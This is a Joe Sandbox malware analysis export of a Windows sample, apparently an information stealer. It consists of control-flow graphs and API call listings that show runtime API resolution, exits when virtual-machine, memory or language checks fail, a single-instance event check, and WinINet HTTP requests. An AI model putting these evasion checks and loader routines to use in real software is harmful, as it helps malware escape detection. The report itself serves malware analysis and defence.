26735 6f0751 26733->26735 26734->26735 27689 6f2740 GetWindowsDirectoryA 26735->27689 26737 6f0785 27698 6d4c50 26737->27698 26738 
6f075d 26738->26737 26740 6f077d lstrcpy 26738->26740 26740->26737 26741 6f078f 27852 6e8ca0 StrCmpCA 26741->27852 26743 6f079b 26744 6d1530 8 API calls 26743->26744 26745 6f07bc 26744->26745 26746 6f07ed 26745->26746 26747 6f07e5 lstrcpy 26745->26747 27870 6d60d0 80 API calls 26746->27870 26747->26746 26749 6f07fa 27871 6e81b0 10 API calls 26749->27871 26751 6f0809 26752 6d1530 8 API calls 26751->26752 26753 6f082f 26752->26753 26754 6f085e 26753->26754 26755 6f0856 lstrcpy 26753->26755 27872 6d60d0 80 API calls 26754->27872 26755->26754 26757 6f086b 27873 6e7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 26757->27873 26759 6f0876 26760 6d1530 8 API calls 26759->26760 26761 6f08a1 26760->26761 26762 6f08c9 lstrcpy 26761->26762 26763 6f08d5 26761->26763 26762->26763 27874 6d60d0 80 API calls 26763->27874 26765 6f08db 27875 6e8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 26765->27875 26767 6f08e6 26768 6d1530 8 API calls 26767->26768 26769 6f08f7 26768->26769 26770 6f092e 26769->26770 26771 6f0926 lstrcpy 26769->26771 27876 6d5640 8 API calls 26770->27876 26771->26770 26773 6f0933 26774 6d1530 8 API calls 26773->26774 26775 6f094c 26774->26775 27877 6e7280 1498 API calls 26775->27877 26777 6f099f 26778 6d1530 8 API calls 26777->26778 26779 6f09cf 26778->26779 26780 6f09fe 26779->26780 26781 6f09f6 lstrcpy 26779->26781 27878 6d60d0 80 API calls 26780->27878 26781->26780 26783 6f0a0b 27879 6e83e0 7 API calls 26783->27879 26785 6f0a18 26786 6d1530 8 API calls 26785->26786 26787 6f0a29 26786->26787 27880 6d24e0 230 API calls 26787->27880 26789 6f0a6b 26790 6f0a7f 26789->26790 26791 6f0b40 26789->26791 26792 6d1530 8 API calls 26790->26792 26793 6d1530 8 API calls 26791->26793 26794 6f0aa5 26792->26794 26796 6f0b59 26793->26796 26797 6f0acc lstrcpy 26794->26797 26798 6f0ad4 26794->26798 26795 6f0b87 27884 6d60d0 80 API calls 26795->27884 26796->26795 26799 6f0b7f lstrcpy 26796->26799 26797->26798 27881 6d60d0 80 API calls 26798->27881 26799->26795 26802 6f0b8d 27885 
6ec840 70 API calls 26802->27885 26803 6f0ada 27882 6e85b0 47 API calls 26803->27882 26806 6f0b38 26809 6f0bd1 26806->26809 26812 6d1530 8 API calls 26806->26812 26807 6f0ae5 26808 6d1530 8 API calls 26807->26808 26811 6f0af6 26808->26811 26810 6f0bfa 26809->26810 26813 6d1530 8 API calls 26809->26813 26814 6f0c23 26810->26814 26818 6d1530 8 API calls 26810->26818 27883 6ed0f0 118 API calls 26811->27883 26816 6f0bb9 26812->26816 26817 6f0bf5 26813->26817 26820 6f0c4c 26814->26820 26825 6d1530 8 API calls 26814->26825 27886 6ed7b0 103 API calls __crtGetStringTypeA_stat 26816->27886 27888 6edfa0 149 API calls 26817->27888 26823 6f0c1e 26818->26823 26821 6f0c75 26820->26821 26826 6d1530 8 API calls 26820->26826 26827 6f0c9e 26821->26827 26833 6d1530 8 API calls 26821->26833 27889 6ee500 108 API calls 26823->27889 26824 6f0bbe 26829 6d1530 8 API calls 26824->26829 26830 6f0c47 26825->26830 26832 6f0c70 26826->26832 26835 6f0cc7 26827->26835 26836 6d1530 8 API calls 26827->26836 26834 6f0bcc 26829->26834 27890 6ee720 120 API calls 26830->27890 27891 6ee9e0 110 API calls 26832->27891 26839 6f0c99 26833->26839 27887 6eecb0 98 API calls 26834->27887 26837 6f0cf0 26835->26837 26842 6d1530 8 API calls 26835->26842 26841 6f0cc2 26836->26841 26843 6f0dca 26837->26843 26844 6f0d04 26837->26844 27892 6d7bc0 154 API calls 26839->27892 27893 6eeb70 108 API calls 26841->27893 26847 6f0ceb 26842->26847 26849 6d1530 8 API calls 26843->26849 26848 6d1530 8 API calls 26844->26848 27894 6f41e0 91 API calls 26847->27894 26853 6f0d2a 26848->26853 26851 6f0de3 26849->26851 26852 6f0e11 26851->26852 26854 6f0e09 lstrcpy 26851->26854 27898 6d60d0 80 API calls 26852->27898 26855 6f0d5e 26853->26855 26856 6f0d56 lstrcpy 26853->26856 26854->26852 27895 6d60d0 80 API calls 26855->27895 26856->26855 26859 6f0e17 27899 6ec840 70 API calls 26859->27899 26860 6f0d64 27896 6e85b0 47 API calls 26860->27896 26863 6f0dc2 26866 6d1530 8 API calls 26863->26866 26864 6f0d6f 26865 6d1530 8 API calls 
26864->26865 26867 6f0d80 26865->26867 26869 6f0e39 26866->26869 27897 6ed0f0 118 API calls 26867->27897 26870 6f0e67 26869->26870 26872 6f0e5f lstrcpy 26869->26872 27900 6d60d0 80 API calls 26870->27900 26872->26870 26873 6f0e74 26875 6f0e95 26873->26875 27901 6f1660 12 API calls 26873->27901 26875->26553 26876->26524 26878 6d4a76 RtlAllocateHeap 26877->26878 26881 6d4ab4 VirtualProtect 26878->26881 26881->26556 26883 6f182e 26882->26883 26884 6f1849 lstrcpy 26883->26884 26885 6f1855 lstrlen 26883->26885 26884->26885 26886 6f1873 26885->26886 26887 6f1885 lstrcpy lstrcat 26886->26887 26888 6f1898 26886->26888 26887->26888 26889 6f18c7 26888->26889 26890 6f18bf lstrcpy 26888->26890 26891 6f18ce lstrlen 26889->26891 26890->26889 26892 6f18e6 26891->26892 26893 6f18f2 lstrcpy lstrcat 26892->26893 26894 6f1906 26892->26894 26893->26894 26895 6f1935 26894->26895 26896 6f192d lstrcpy 26894->26896 26897 6f193c lstrlen 26895->26897 26896->26895 26898 6f1958 26897->26898 26899 6f196a lstrcpy lstrcat 26898->26899 26900 6f197d 26898->26900 26899->26900 26901 6f19ac 26900->26901 26902 6f19a4 lstrcpy 26900->26902 26903 6f19b3 lstrlen 26901->26903 26902->26901 26904 6f19cb 26903->26904 26905 6f19d7 lstrcpy lstrcat 26904->26905 26906 6f19eb 26904->26906 26905->26906 26907 6f1a1a 26906->26907 26908 6f1a12 lstrcpy 26906->26908 26909 6f1a21 lstrlen 26907->26909 26908->26907 26910 6f1a3d 26909->26910 26911 6f1a4f lstrcpy lstrcat 26910->26911 26912 6f1a62 26910->26912 26911->26912 26913 6f1a91 26912->26913 26914 6f1a89 lstrcpy 26912->26914 26915 6f1a98 lstrlen 26913->26915 26914->26913 26916 6f1ab4 26915->26916 26917 6f1ac6 lstrcpy lstrcat 26916->26917 26918 6f1ad9 26916->26918 26917->26918 26919 6f1b08 26918->26919 26920 6f1b00 lstrcpy 26918->26920 26919->26672 26920->26919 26922 6d2a24 SystemTimeToFileTime SystemTimeToFileTime 26921->26922 26922->26675 26922->26676 26924 6f157f 26923->26924 26925 6f159f lstrcpy 26924->26925 26926 6f15a7 26924->26926 26925->26926 26927 6f15d7 
[Control-flow graph export from the Joe Sandbox IDA plugin: numeric node IDs, code addresses in the module loaded at 0x6D0000, per-node API calls and "->" edges, not readable as text. The API calls labelled on the graph's nodes are: lstrcpy, lstrlen, lstrcat, StrCmpCA, GetProcAddress, Sleep, ExitProcess, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA, GetSystemTime, InternetCrackUrlA, InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle, CryptStringToBinaryA, LocalAlloc, LocalFree, GetSystemInfo, GetUserDefaultLocaleName, CharToOemW, GetSystemPowerStatus, GetCurrentProcess, IsWow64Process, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, OpenProcess, GetModuleFileNameExA, CloseHandle, GlobalMemoryStatusEx, GetTimeZoneInformation, malloc, ctype, __setmbcp and ??2@YAPAXI (C++ operator new).]
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D4C7F
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4CD2
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4D05
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4D35
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4D73
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006D4DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 51ab15b177a7f64a09ada284c634ceea4c79e882528145787d10979312424fcb
                            • Instruction ID: d90a244b70ab545eeb151177bf72109519c8b4f5c6128ef8f521dc48decc2010
                            • Opcode Fuzzy Hash: 51ab15b177a7f64a09ada284c634ceea4c79e882528145787d10979312424fcb
                            • Instruction Fuzzy Hash: 07527D71E1521A9FCB61EFA4DC49BAE77BAAF04310F08402AF906AB351DB34DD418B94

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2125 6f6390-6f63bd GetPEB 2126 6f65c3-6f6623 LoadLibraryA * 5 2125->2126 2127 6f63c3-6f65be call 6f62f0 GetProcAddress * 20 2125->2127 2128 6f6638-6f663f 2126->2128 2129 6f6625-6f6633 GetProcAddress 2126->2129 2127->2126 2131 6f666c-6f6673 2128->2131 2132 6f6641-6f6667 GetProcAddress * 2 2128->2132 2129->2128 2134 6f6688-6f668f 2131->2134 2135 6f6675-6f6683 GetProcAddress 2131->2135 2132->2131 2136 6f66a4-6f66ab 2134->2136 2137 6f6691-6f669f GetProcAddress 2134->2137 2135->2134 2139 6f66ad-6f66d2 GetProcAddress * 2 2136->2139 2140 6f66d7-6f66da 2136->2140 2137->2136 2139->2140
                            APIs
                            • GetProcAddress.KERNEL32(76210000,01011668), ref: 006F63E9
                            • GetProcAddress.KERNEL32(76210000,01011680), ref: 006F6402
                            • GetProcAddress.KERNEL32(76210000,010116E0), ref: 006F641A
                            • GetProcAddress.KERNEL32(76210000,01011518), ref: 006F6432
                            • GetProcAddress.KERNEL32(76210000,01018B28), ref: 006F644B
                            • GetProcAddress.KERNEL32(76210000,01005228), ref: 006F6463
                            • GetProcAddress.KERNEL32(76210000,01004FC8), ref: 006F647B
                            • GetProcAddress.KERNEL32(76210000,01011698), ref: 006F6494
                            • GetProcAddress.KERNEL32(76210000,010116C8), ref: 006F64AC
                            • GetProcAddress.KERNEL32(76210000,010117B8), ref: 006F64C4
                            • GetProcAddress.KERNEL32(76210000,010117D0), ref: 006F64DD
                            • GetProcAddress.KERNEL32(76210000,010051A8), ref: 006F64F5
                            • GetProcAddress.KERNEL32(76210000,010114E8), ref: 006F650D
                            • GetProcAddress.KERNEL32(76210000,01011530), ref: 006F6526
                            • GetProcAddress.KERNEL32(76210000,01005128), ref: 006F653E
                            • GetProcAddress.KERNEL32(76210000,01011548), ref: 006F6556
                            • GetProcAddress.KERNEL32(76210000,01011560), ref: 006F656F
                            • GetProcAddress.KERNEL32(76210000,01005288), ref: 006F6587
                            • GetProcAddress.KERNEL32(76210000,01011830), ref: 006F659F
                            • GetProcAddress.KERNEL32(76210000,01005308), ref: 006F65B8
                            • LoadLibraryA.KERNEL32(01011878,?,?,?,006F1C03), ref: 006F65C9
                            • LoadLibraryA.KERNEL32(01011848,?,?,?,006F1C03), ref: 006F65DB
                            • LoadLibraryA.KERNEL32(01011890,?,?,?,006F1C03), ref: 006F65ED
                            • LoadLibraryA.KERNEL32(010117E8,?,?,?,006F1C03), ref: 006F65FE
                            • LoadLibraryA.KERNEL32(01011860,?,?,?,006F1C03), ref: 006F6610
                            • GetProcAddress.KERNEL32(75B30000,01011800), ref: 006F662D
                            • GetProcAddress.KERNEL32(751E0000,010118A8), ref: 006F6649
                            • GetProcAddress.KERNEL32(751E0000,01011818), ref: 006F6661
                            • GetProcAddress.KERNEL32(76910000,01018F20), ref: 006F667D
                            • GetProcAddress.KERNEL32(75670000,010050E8), ref: 006F6699
                            • GetProcAddress.KERNEL32(77310000,01018B08), ref: 006F66B5
                            • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 006F66CC
                            Strings
                            • NtQueryInformationProcess, xrefs: 006F66C1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 35916862155a8cbe592659b1beaf148655aa829dc336c69a96b10cf69119ede2
                            • Instruction ID: acd345915461fdf6334541cd6e795cf8af9ee0e03bdab251b368e89d913f06c8
                            • Opcode Fuzzy Hash: 35916862155a8cbe592659b1beaf148655aa829dc336c69a96b10cf69119ede2
                            • Instruction Fuzzy Hash: 3CA15DB5A3D601EFD754DF64EC88A263BB9F7897443008519EA96C3362DB74A840FF60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2141 6f1bf0-6f1c0b call 6d2a90 call 6f6390 2146 6f1c0d 2141->2146 2147 6f1c1a-6f1c27 call 6d2930 2141->2147 2148 6f1c10-6f1c18 2146->2148 2151 6f1c29-6f1c2f lstrcpy 2147->2151 2152 6f1c35-6f1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 6f1c6d-6f1c7b GetSystemInfo 2152->2156 2157 6f1c65-6f1c67 ExitProcess 2152->2157 2158 6f1c7d-6f1c7f ExitProcess 2156->2158 2159 6f1c85-6f1ca0 call 6d1030 call 6d10c0 GetUserDefaultLangID 2156->2159 2164 6f1cb8-6f1cca call 6f2ad0 call 6f3e10 2159->2164 2165 6f1ca2-6f1ca9 2159->2165 2171 6f1ccc-6f1cde call 6f2a40 call 6f3e10 2164->2171 2172 6f1ce7-6f1d06 lstrlen call 6d2930 2164->2172 2165->2164 2166 6f1cb0-6f1cb2 ExitProcess 2165->2166 2171->2172 2183 6f1ce0-6f1ce1 ExitProcess 2171->2183 2178 6f1d08-6f1d0d 2172->2178 2179 6f1d23-6f1d40 lstrlen call 6d2930 2172->2179 2178->2179 2181 6f1d0f-6f1d11 2178->2181 2186 6f1d5a-6f1d7b call 6f2ad0 lstrlen call 6d2930 2179->2186 2187 6f1d42-6f1d44 2179->2187 2181->2179 2184 6f1d13-6f1d1d lstrcpy lstrcat 2181->2184 2184->2179 2193 6f1d7d-6f1d7f 2186->2193 2194 6f1d9a-6f1db4 lstrlen call 6d2930 2186->2194 2187->2186 2188 6f1d46-6f1d54 lstrcpy lstrcat 2187->2188 2188->2186 2193->2194 2195 6f1d81-6f1d85 2193->2195 2199 6f1dce-6f1deb call 6f2a40 lstrlen call 6d2930 2194->2199 2200 6f1db6-6f1db8 2194->2200 2195->2194 2197 6f1d87-6f1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 6f1ded-6f1def 2199->2206 2207 6f1e0a-6f1e0f 2199->2207 2200->2199 2201 6f1dba-6f1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 6f1df1-6f1df5 2206->2208 2209 6f1e16-6f1e22 call 6d2930 2207->2209 2210 6f1e11 call 6d2a20 2207->2210 2208->2207 2211 6f1df7-6f1e04 lstrcpy lstrcat 2208->2211 2215 6f1e24-6f1e26 2209->2215 2216 6f1e30-6f1e66 call 6d2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 6f1e28-6f1e2a lstrcpy 2215->2217 2228 6f1e8c-6f1ea0 CreateEventA call 6f1b20 call 6effd0 2216->2228 2229 6f1e68-6f1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 6f1ea5-6f1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                            APIs
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01011668), ref: 006F63E9
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01011680), ref: 006F6402
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010116E0), ref: 006F641A
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01011518), ref: 006F6432
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01018B28), ref: 006F644B
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01005228), ref: 006F6463
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01004FC8), ref: 006F647B
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,01011698), ref: 006F6494
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010116C8), ref: 006F64AC
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010117B8), ref: 006F64C4
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010117D0), ref: 006F64DD
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010051A8), ref: 006F64F5
                              • Part of subcall function 006F6390: GetProcAddress.KERNEL32(76210000,010114E8), ref: 006F650D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F1C2F
                            • ExitProcess.KERNEL32 ref: 006F1C67
                            • GetSystemInfo.KERNEL32(?), ref: 006F1C71
                            • ExitProcess.KERNEL32 ref: 006F1C7F
                              • Part of subcall function 006D1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006D1046
                              • Part of subcall function 006D1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 006D104D
                              • Part of subcall function 006D1030: ExitProcess.KERNEL32 ref: 006D1058
                              • Part of subcall function 006D10C0: GlobalMemoryStatusEx.KERNEL32 ref: 006D10EA
                              • Part of subcall function 006D10C0: ExitProcess.KERNEL32 ref: 006D1114
                            • GetUserDefaultLangID.KERNEL32 ref: 006F1C8F
                            • ExitProcess.KERNEL32 ref: 006F1CB2
                            • ExitProcess.KERNEL32 ref: 006F1CE1
                            • lstrlen.KERNEL32(01018AE8), ref: 006F1CEE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F1D15
                            • lstrcat.KERNEL32(00000000,01018AE8), ref: 006F1D1D
                            • lstrlen.KERNEL32(00704B98), ref: 006F1D28
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1D48
                            • lstrcat.KERNEL32(00000000,00704B98), ref: 006F1D54
                            • lstrlen.KERNEL32(00000000), ref: 006F1D63
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1D89
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1D94
                            • lstrlen.KERNEL32(00704B98), ref: 006F1D9F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1DBC
                            • lstrcat.KERNEL32(00000000,00704B98), ref: 006F1DC8
                            • lstrlen.KERNEL32(00000000), ref: 006F1DD7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1DF9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006F1E04
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: 639d11582e34f3ce6fe0a12128c8078529f4cf3f8d597449f8ada3a370673e47
                            • Instruction ID: 0d32d91da89b27bab7462318d9a96fb9356c405674832845a80ec53d522f57e8
                            • Opcode Fuzzy Hash: 639d11582e34f3ce6fe0a12128c8078529f4cf3f8d597449f8ada3a370673e47
                            • Instruction Fuzzy Hash: F171E87161421AEFD760ABB1DC5DB7F3ABBAF52741F044018FA469A2A1DF349801DB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 6d6c40-6d6c64 call 6d2930 2237 6d6c75-6d6c97 call 6d4bc0 2234->2237 2238 6d6c66-6d6c6b 2234->2238 2242 6d6c99 2237->2242 2243 6d6caa-6d6cba call 6d2930 2237->2243 2238->2237 2239 6d6c6d-6d6c6f lstrcpy 2238->2239 2239->2237 2244 6d6ca0-6d6ca8 2242->2244 2247 6d6cbc-6d6cc2 lstrcpy 2243->2247 2248 6d6cc8-6d6cf5 InternetOpenA StrCmpCA 2243->2248 2244->2243 2244->2244 2247->2248 2249 6d6cfa-6d6cfc 2248->2249 2250 6d6cf7 2248->2250 2251 6d6ea8-6d6ebb call 6d2930 2249->2251 2252 6d6d02-6d6d22 InternetConnectA 2249->2252 2250->2249 2259 6d6ebd-6d6ebf 2251->2259 2260 6d6ec9-6d6ee0 call 6d2a20 * 2 2251->2260 2253 6d6d28-6d6d5d HttpOpenRequestA 2252->2253 2254 6d6ea1-6d6ea2 InternetCloseHandle 2252->2254 2256 6d6e94-6d6e9e InternetCloseHandle 2253->2256 2257 6d6d63-6d6d65 2253->2257 2254->2251 2256->2254 2261 6d6d7d-6d6dad HttpSendRequestA HttpQueryInfoA 2257->2261 2262 6d6d67-6d6d77 InternetSetOptionA 2257->2262 2259->2260 2263 6d6ec1-6d6ec3 lstrcpy 2259->2263 2265 6d6daf-6d6dd3 call 6f71e0 call 6d2a20 * 2 2261->2265 2266 6d6dd4-6d6de4 call 6f3d90 2261->2266 2262->2261 2263->2260 2266->2265 2275 6d6de6-6d6de8 2266->2275 2277 6d6e8d-6d6e8e InternetCloseHandle 2275->2277 2278 6d6dee-6d6e07 InternetReadFile 2275->2278 2277->2256 2278->2277 2280 6d6e0d 2278->2280 2282 6d6e10-6d6e15 2280->2282 2282->2277 2283 6d6e17-6d6e3d call 6f7310 2282->2283 2286 6d6e3f call 6d2a20 2283->2286 2287 6d6e44-6d6e51 call 6d2930 2283->2287 2286->2287 2291 6d6e61-6d6e8b call 6d2a20 InternetReadFile 2287->2291 2292 6d6e53-6d6e57 2287->2292 2291->2277 2291->2282 2292->2291 2293 6d6e59-6d6e5b lstrcpy 2292->2293 2293->2291
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D6C6F
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D6CC2
                            • InternetOpenA.WININET(006FCFEC,00000001,00000000,00000000,00000000), ref: 006D6CD5
                            • StrCmpCA.SHLWAPI(?,0101FB50), ref: 006D6CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D6D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,0101F670,00000000,00000000,-00400100,00000000), ref: 006D6D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006D6D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006D6D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006D6DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006D6DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D6E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 006D6E7D
                            • InternetCloseHandle.WININET(00000000), ref: 006D6E8E
                            • InternetCloseHandle.WININET(?), ref: 006D6E98
                            • InternetCloseHandle.WININET(00000000), ref: 006D6EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D6EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
